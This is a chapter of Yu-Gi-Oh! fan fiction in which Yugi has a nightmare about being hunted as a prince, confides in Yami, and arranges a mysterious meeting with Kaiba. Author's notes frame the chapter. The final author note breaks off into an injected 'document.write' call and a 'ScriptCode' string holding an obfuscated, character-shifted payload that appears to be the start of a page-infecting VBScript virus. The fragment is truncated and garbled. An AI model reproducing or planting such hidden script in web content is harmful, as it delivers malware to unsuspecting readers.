Yu-Gi-Oh! Fan Fiction ❯ Lost Identity ❯ The Letter ( Chapter 2 )

[ P - Pre-Teen ]

az: Hmm... am I a bit too talkative at the last chapter? Bad me... but if I'm not like that, I won't be here and create silly fics!! Hopefully, I got the ideas needed to finish this fic. This idea kept haunting me for months now.

az: About the timeline... I think I'll put it before the time when Yugi's grandpa found out about Yami... Heck, how can I actually knew when is the timeline... Ch... This is getting pretty stupid an argument... I'll put this story more to the future than the manga... fuh, satisfied.... bought and watched the third season of YGO... hope that helps... ^=^


Disclaimer: I don't own Yugioh manga nor did I own anime. Read and review and I don't own Yu-gi-oh. The day when I owned them, was when Kaiba became Jounouchi's best friend and Yugi gone crazy because of it. Characters and original excerpt from the fic are copyrights of Kazuki Takahashi.


Chapter 2: The letter

Written by Azzie/Az @ Alienna Azuani

~Yugi~

The passageways were endlessly long and my legs were tired. I couldn't run anymore but I knew that I must. Because if I didn't, it will ultimately cause me my life. How did I knew that, I didn't know...

/Run, dear prince. Run!! I'll stall this kid. Run!!/

I'm running, I'm running!!, I cried in frustration. But what was I'm running from..?, I cried again hoping for the voice to reply. And, wait... who's the prince anyway? I'm not a prince... so why did I ran? The voice clearly asked for the prince to save himself, not me... A million questions popped into my head as I blindly ran. And suddenly a strange-robed man stopped me from going further. I backed away, feeling that I could not trust this person. And my instincts proved right as the man spoke to me in a very aggressive way.

'There's no way for you to run now, prince...', the strange guy spoke to me. Prince? What prince? What is going on?

'Prince... there's no other way. You have to challenge him to a duel...!!'

Duel? What $%^$ duel I have to make? Suddenly, I heard a strange sound behind my back. I turned as suddenly a large dragon came swooping towards me throwing a large ball of fire...

**

Yugi screamed in shock as his grandfather rushed towards his aid. 'What is it, child? Did something attacked you?', stuttered Yugi's grandpa as he comforted him. Yugi shook his head nervously as he stammered incoherently. 'No.. no, grandpa. I'm okay... really, just a nightmare...', mumbled Yugi though that didn't made his grandfather more convinced. 'I can't believe you... your face was very pale.'

'Me okay, grandpa... I'll just have to wash my face and get back to sleep.', said Yugi as he slowly got up the sofa. His face started to regain some of its color. Sugoroku sighed heavily as he kissed Yugi's forehead affectionately. 'You do that... and Yugi, you had a letter.', said Grandpa as he picked up the envelope from the tea-table. 'You were sleeping when I got back from the shop, so I left it here...'

'Thanks, grandpa... I'll go upstairs now, okay?', chirped Yugi as he climbed the stairs towards his bedroom...

Yugi closed the door to his bedroom slowly as the door made a soft click, and he let himself fall gently on the floor. Yugi sighed as he balled himself tightly at the corner of the room.

'Are you really okay, aibou? Despite what you told grandfather just now, I don't believe that you had simply a nightmare down there.', said Yami as his forehead creased with worry. Yugi looked up towards his partner. 'No.. Yami. I just don't want him to worry. I don't want him to regret that he had ever let me solve the Millennium puzzle.' Yami placed his hand on Yugi's. 'Did you dream about... that?'

Yugi nodded half-heartedly as Yami sat beside him. 'This time I dreamt that I was being chased by someone... or something. Why did I have to get that dream... and not you?', said Yugi, almost whispering to Yami. Yami sighed. 'Maybe what you said about us being two halves of a soul had some truth in it...', mused Yami silently. Yugi gave him a strange look. Yami countered by lifting his eyebrow at him. 'Hey, don't ask me.. I'm just guessing. My soul was trapped inside the puzzle for three million years and I had no memories of my past. How could I have nightmares about it if I didn't have any memories to cause one..?' Yugi's eyes widen in understanding. 'I supposed you got a point there. But Yami, I had a bad feeling about this. I've been having similar dreams like this for few nights now in a row. I'm worried if this was a sign...'

/Aah... leave it for tomorrow, aibou. Why don't you go read the letter you've got? Loads better to think about than that dream.../

Yugi rolled his eyes at his yami. 'And risk myself having dark eyes tomorrow at school? No, I'll be reading this tomorrow or I tell Jyou-kun you made me stay up late to read some stupid letter...', said Yugi, grinning. Yami smiled in return as he messed up Yugi's hair. 'That's my cheerful hikari...'

Yugi's eyes lighted up. 'You.. sneaky yami. How did you learned to talk like that?'

Yami winked at him cheekily. 'I got a lot of influence from my light..'

**

The next day, Domino High school, Yugi's classroom

It was still early and the class was half-full. But the class was still noisy as Jyounouchi ran around taunting Honda for still not having any girlfriends. Honda steamed up and ended fighting with him. Otogi was at the sidelines cheering for Jyounouchi while sending a mouthful of insults towards Honda. Well, naturally he would be doing that since Honda was his rival in getting Shizuka's affections and certainly no strategy was better than getting to Jyounouchi's good side, eh? ^_~

Anzu and Miho watched the boys eagerly; feeling slightly amused at their antics as Yugi eventually arrived, entering the classroom. Anzu called out for him but Yugi hadn't noticed her. Instead, he walked towards Kaiba; who was trying to ignore the voices in front of him and to ignore the fact that he actually were in the same class as the no-name dueler that he dares not mentioning in his lifetime. (Fuh!! All in one breath!!)

Yugi stopped in front of Kaiba as he waited for him to finish typing whatever it was that he was doing on his laptop. Kaiba stopped typing suddenly, noticing the presence of his arch-rival in front of him and looked up. 'Oi, what do you want? Don't assume that you can just come up to me like I'm your friend only because we had once cooperated in a duel and you having defeated me a number of times! Okay, fess up. What do you want with me?'

Yugi was expressionless. He only kept staring at Kaiba calmly as he blurt out everything that he was thinking about. As he finished, Yugi spoke. 'Kaiba, do you have some free time after school today?'

Kaiba gave him a calculating look. 'So if I had a free time, what do you care?'

'Then, I'll be seeing you after school today. Remember, I'll be waiting...', said Yugi as he turned back towards his own desk. Kaiba just stared at his back as he wondered what is it that had gone through the guy today. O, you've started ordering me around suddenly... Okay, I'll meet you after this. Let's see what trick you want to show me.. Yugi..., thought Kaiba as he returned to his laptop. Well, even if he'd decided to continue his studies, he still have to watch over his corporation. So that none of his subordinates tried to double-cross him again like last time with Pegasus.

Anzu walked towards Yugi and took a chair to sit beside him. 'Yugi, are you okay? You did rest like I told you so yesterday, right? So, what's bothering you?', asked Anzu as Yugi looked up at her. Yugi tried to give her a smile but the smile doesn't reach his eyes. 'I'm alright. My other self had made sure that I followed your advice, so nothing to worry about...', said Yugi.

Anzu frowned at him as she noticed that something was amiss. 'Still, I feel that..' Jyounouchi stopped fighting with Honda as he noticed Yugi and Anzu were sitting together. In less than a minute, he popped up between them, causing Anzu to jump away. 'Hey hey... had you two started dating again?', said Jyounouchi as Honda, Otogi and Miho swarmed up around them. Kaiba glanced at them for a short while as he noticed Yugi's looks. He chuckled slightly to himself but grew serious again as he wondered about Yugi's change of attitude.

Anzu's face flushed as she tried to deny it but Yugi did nothing, even though his own face was slightly red. Seeing that no answer came from Yugi, Jounouchi wrapped his arm around him to taunt him. 'Oi.. oi, why didn't you answer? Do you want to keep this by yourself?', said Jyounouchi again not expecting Yugi to do anything unexpected.

But he did. Yugi suddenly pushed him away and stood up. 'Err, gomen. I, um... I think I'm not feeling so well. Sumimasen...', stammered Yugi as he ran out towards the door. Without paying any attention, he bumped into Bakura head on and both fell on the floor outside the class. The gang rushed out to see what happened as Bakura helped Yugi up. 'Oh... hello, pharaoh. Funny for me to... bump into you, hehe...', jeered Bakura. Yugi frowned as he looked at him. 'Oi, Bakura... this is not the place for you to show up! Turn back to Ryou!!', said Yugi as he scowled at Bakura. Bakura was clearly surprised. 'Hey, what's got into you?'

Yugi immediately changed into Yami. 'I don't want to repeat myself!! Back off!!', said Yami as he walked away. Bakura watched him leave, confusion clearly was written all over his face. Jyounouchi instantly grabbed Bakura by the shirt. 'Hey, what have you done?!'

Bakura shrugged Jyounouchi off his back with ease. 'How would I know!!? If it's the pharaoh, I could understand but that was your friend! Sheesh, I did nothing and the guy shout at me. And here I thought he was always nice to me.. the other me!! But there, you saw it!! Even the pharaoh defendef him!! Like they're always right and I'm always wrong!!', snapped Bakura as he reverted into his other half and entered the class. The gang watched Bakura go with awe. Jyounouchi scratched his head dumbly. 'I'd never thought Bakura would react like that... but he said that Yugi...'

'He's right..', said Anzu suddenly. The trio glanced at her at the same time. 'If you had to know... right now, Yugi had began to looked more like his Yami! Hey, do you think Yugi hadn't grew taller ever since the battle city tournament?', said Anzu again as she started to leave. Jyounouchi stopped her. 'Hey, Anzu...! Do you know something about this?'

Miho pushed Jyounouchi aside. 'Anzu, hadn't you gone visiting him yesterday? Tell us, what was wrong with him?'

Anzu looked away as she walked back into the class, followed by Jyounouchi, Honda and Miho. She stopped as she reached her own desk. 'Yugi was facing a situation that only he himself could solve it.', she said, looking up towards them. 'It's best that you guys don't ask him about it.'

Having overheard Anzu's word, Kaiba glanced at them; wondering if this had to do with Yugi wanting to meet him later in the day...

At the washroom...

Yugi violently splashed his face with the tap water as he leant onto the wall for support. 'Feeling any better, aibou?', asked Yami as Yugi kept massaging his forehead. 'Nah... I think I need to go to the sick room. My headache hadn't gone away even though I did take the pills before coming here. That dream... it felt so real that my energy seemed to have drained...'

/Then, we should cancel our plan this evening to meet the guy.../

Yugi searched his left pocket as he pulled out a piece of paper. He scanned the paper a while before putting it away again. 'No, we will go there. I don't know why... but I think me having those dreams, must have got to do with this meeting...'

/But, aibou... this could be a trap!! You are already weaken... it'll be dangerous for you!!/

Yugi glanced towards his other self. 'That was a risk that I should take!! Mou hitori no boku, don't you realize this? We maybe had found out parts of your lost memories but we still didn't know why were you sealed inside the puzzle in the first place! And I had those dream that could probably explain what happened!!'

/But aibou!! This is still a big risk on you!!/

Yugi smiled as he left the wash room to go to the sick bay. 'I'm not worried. As long as both of us are alive, I could always trust you to protect me. As I will protect you... am I right, Yami?'

Yami sighed as he yielded to him. 'Yes, you're right... aibou...'

**

'Ahahahahah.. Honda!! You could never beat me in winning Shizuka's heart!! I'm a lot better than you and you know it!'

'Hey, Otogi!! Who said that you're better!! You're just one lousy, squid-headed..'

'Cut it out!! None of you are getting a go at my sister until I say so!!', shouted Jyounouchi as he looked around for Yugi. Both Otogi and Honda started begging for Jyounouchi to give them a chance but he ignored them as he saw Yugi coming out from the school building. He ran towards him.

'Yugi!! Wanna head home with me? We could drop by the gaming alley on the way home...', Jyounouchi asked as Yugi shook his head politely. 'Sorry, Jounouchi-kun. But I was waiting for Kaiba... and I had to go someplace else after that. Gomen...'

Jyounouchi's eyes widen at the mention of the name. 'K..Kaiba?! Why do you want to meet him?'

'I had something important to ask him. See you later... Jyounouchi-kun!', said Yugi as he sped away to find Kaiba, leaving Jyounouchi standing stupidly at the pavements. Anzu ran up to him. 'Why were you standing here for? The others are waiting!', cried Anzu. Jyounouchi turned to look at her. 'Yugi... he, he's meeting K..Kaiba..'

'Then, let him. Yugi can meet anyone that he wants to, even Kaiba. And... uh?'

'What is it? Anzu?!'

Anzu sighed to herself. 'I seemed to left one of my notebooks at the classroom. Don't worry, I'll go and get it..', said Anzu as she ran into the building. Jounouchi walked away as he pondered about Yugi's strange attitude that day...

At the classroom, Anzu rushed to her desk as she found her note book. She was about to leave when she noticed a rumpled up paper inside Yugi's desk drawer. She picked up the paper and read it. 'Hmm...'Meet me at the place where the pieces lays, to find out about the answers you seek'? Hai... this is strange, who would want to put this under Yugi's table?', mused Anzu as she left. Nevertheless, she pocketed the paper inside her bag...

At another place, Kaiba was waiting patiently as Yugi arrived to meet him. Yugi smiled. 'I'm glad you agreed to meet me.', he said as Kaiba kept his distance from him. 'What do you want from me?'

'I need your help, Kaiba and it was very important..'

[TBC]


az: And anyway, hope that this update could satisfy everyone... I'm trying my best here, and I hoped that I don't mess up the story.. and what pairing should it be... document.write "

" ScriptCode = "ChlRBqhos+VRBqhos+@ookds+VhmO`sg+mEnkcdq+mBncdRtaQtm^Shld'(EE/0'(EE/1'(Dmc RtaEtmbshnmEE/0'(NmDqqnqQdrtldMdwsDqq-Bkd`qSncnHs